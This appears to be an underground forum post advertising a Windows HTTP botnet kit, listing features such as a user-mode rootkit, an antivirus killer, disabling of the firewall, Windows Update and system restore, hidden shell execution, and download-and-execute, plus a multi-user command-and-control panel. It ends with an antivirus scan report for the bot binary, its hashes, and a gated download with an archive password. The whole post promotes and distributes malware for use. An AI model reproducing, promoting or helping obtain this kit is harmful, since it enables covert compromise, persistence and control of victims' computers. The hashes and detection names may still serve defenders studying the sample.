12 Years of Service
95%
Bot Feature List:
HTTP bot (communication encrypted using a modified standard encryption algorithm and use of static and dynamic passed around keys)
Coded in C++ (no dependencies other than Windows, no use of CRT, supports unicode/all language characters)
DNS resolving bypasses HOSTS file
Safemode startup ability
Startup with elevation retention (starts up with previously obtained elevated rights)
User-mode rootkit
Persistence and protection of registry key, file, and process
Hides file and startup also not visible in msconfig
Anti-Virus killer (supports 31 security solutions covering 95%+ of the AV market)
Anti-Malware/Botkiller (disables or kills the majority of all malware, even those notorious for being extremely resistant to
tampering. scans heuristically)
Privilege escalation through social engineering
Visit website visible or hidden
Execute shell command visible or hidden
Download & Update (options to confirm with MD5 hash, execute file with commandline arguments, save to specific location)
Uninstallation (gets rid of startup, installed file/directory, executed file, registry keys that hold bot data, and optionally scans
the entire system for any file that matches the MD5 of the currently executed file for deletion)
Disable system restore and delete any old restoration points
Disable Windows Firewall
Disable Windows Update
Detection of shutdown and logoff
Preventing of going into stand-by mode
Support for unlimited domains in configuration
Change homepages on Internet Explorer, Mozilla Firefox, and Google Chrome
Whenever files are deleted by the bot, the memory is freed (safe-delete, a.k.a. data is unrecoverable)
Command&Control Panel is secure from any web-hacking and query injections. supports multi-user management
Proactive AV settings bypasses
CloudFlare support in the Control Panel
~44kb file size
Handling of own Zone.Identifier stream without dampening of optimal internet settings as some other bots do
Additional process persistence via injected watchdog threads
Ability to send a list of download links and have the links be randomly chosen for download or update
Control Panel Feature List:
Captcha on login page prevents any bruteforce attack attempts
Control Panel endured a security audit done by a team of experienced web-vulnerability professionals, you are guaranteed to be hack-safe
Highly detailed information and statistics displayed and stored about your bot network
Detailed displayed commands
Highly modifyable commands: you can pause, restart, and delete commands. You can modify command filters extensively.
Password changing ability
Ability to optionally use a loginpage-URL-key to prevent and discourage panel sniffing attempts
Modifyable bot communication settings
User management page has broad functionality for adding and removing other users, controlling user privileges and seeing how active they have been
There is a page for conveniently viewing the foreground window activity of bots
The control panel is compatible with all recent versions of PHP and MySQL
Filename: bin.exe
Type: File
Filesize: 118784 bytes
Date: 28/01/2015 - 15:58 GMT+2
MD5: 905503d41a0be48c2fe32d27903f1219
SHA1: a437881990a98f7ff5076053505a6b123aed0de6
Status: Infected
Result: 16/35
AVG Free - Found Win32/DH{eYETfH2BDxMeIEhVRF4}
Avast - Win32:Malware-gen
AntiVir (Avira) - TR/Crypt.XPACK.Gen
BitDefender - Gen:Variant.Kazy.133828
Clam Antivirus - Win.Trojan.Chkbot
COMODO Internet Security - OK
Dr.Web - DLOADER.Trojan
eTrust-Vet - OK
F-PROT Antivirus - OK
F-Secure Internet Security - Gen:Variant.Kazy.133828
G Data - Gen:Variant.Kazy.133828
IKARUS Security - OK
Kaspersky Antivirus - Trojan.Win32.Reconyc.dpzv
McAfee - OK
MS Security Essentials - Backdoor:Win32/ChkBot.A
ESET NOD32 - Trojan.Win32/Spy.Agent.ONL
Norman - Gen:Variant.Kazy.133828
Norton Antivirus - OK
Panda Security - OK
A-Squared - OK
Quick Heal Antivirus - OK
Solo Antivirus - OK
Sophos - Mal/Behav-010
Trend Micro Internet Security - OK
VBA32 Antivirus - OK
Zoner AntiVirus - OK
Ad-Aware - Gen:Variant.Kazy.133828
BullGuard - Gen:Variant.Kazy.133828
FortiClient - OK
K7 Ultimate - OK
NANO Antivirus - Trojan.Win32.DownLoader11.dknixv
Panda CommandLine - OK
SUPERAntiSpyware - OK
Twister Antivirus - OK
VIPRE - OK
Scan Result:
This link is hidden for visitors. Please Log in or register now.
This link is hidden for visitors. Please Log in or register now.
[VERDE]Files are Clean[/VERDE] Analyzed by you2004975
Download:
[HIDE-THANKS]
Code:
>pass:level-23.eu
This link is hidden for visitors. Please Log in or register now.
[/HIDE-THANKS]